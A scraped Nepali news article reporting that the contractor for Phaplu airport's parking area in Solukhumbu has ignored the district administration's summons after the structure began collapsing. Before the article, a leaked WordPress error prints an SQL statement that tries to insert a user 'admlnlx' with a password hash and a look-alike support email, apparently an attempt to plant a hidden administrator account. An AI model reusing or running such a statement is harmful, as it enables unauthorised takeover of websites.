WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAAxPrQvht3zu8Q0F4u5jCrDww0dxK1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 04:12:23', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ८ साउन, सोलुखुम्बु । सोलुखुम्बुको सोलुदुधकुन्ड नगरपालिका स्थित फाप्लु विमानस्थलको पार्किङस्थल निर्माणको जिम्मा लिएको निर्माण कम्पनी सम्पर्कमा आउन आलटाल गरेको छ ।
फाप्लु बिमान स्थलमा निर्माणाधिन विमान पार्किङ तथा घेराबार भत्किन थाले पछि जिल्ला प्रशासन कार्यालयल सोलुखुम्बुले निर्माण कम्पनिलाई ७ दिन भित्र लिखित जवाफ सहित उपस्थीत हुन दिएको निर्देशनलाई निर्माण कम्पनिले अटेर गरेको हो ।
विभिन्न सञ्चार माध्यममा विमानस्थलको पार्किङ निर्माण सम्पन्न नहुदै भत्किएको समाचार आए पछि प्रशासनले स्थलगत निरिक्षण गर्दै साउन १ गतेको मितिले ७ दिन भित्र लिखित जवाफ सहित उपस्थित हुन पत्राचार गरेको थियो । तर प्रशासनले तोकेको समय मगंलबार सकिएको भए पनि निमार्ण कम्पनि उपस्थित हुन नसेको प्रमुख जिल्ला अधिकारी नरेन्द्र कुमार रानाले जानकारी दिनुभयो ।
पत्रको जवाफ इमेल मार्फत प्राप्त भए पनि निर्माण कर्ता भने सम्पर्कमा आउँन सकेको छैन् । लिखित जवाफ समेत चित्तबुझ्दो नभएकाले कानुनी प्रकृया अघि बढाईने प्रजिअ रानाको भनाई छ ।
नागरिक उड्डयन प्राधिकरणको ८ करोड ७८ लाखको लागतमा काष्टमण्डप उमा एण्ड कम्पनी जेभीले निर्माण जिम्मा पाएको थियो ।
साभार: सोलु एम एम
https://gaulenews.com/?p=47306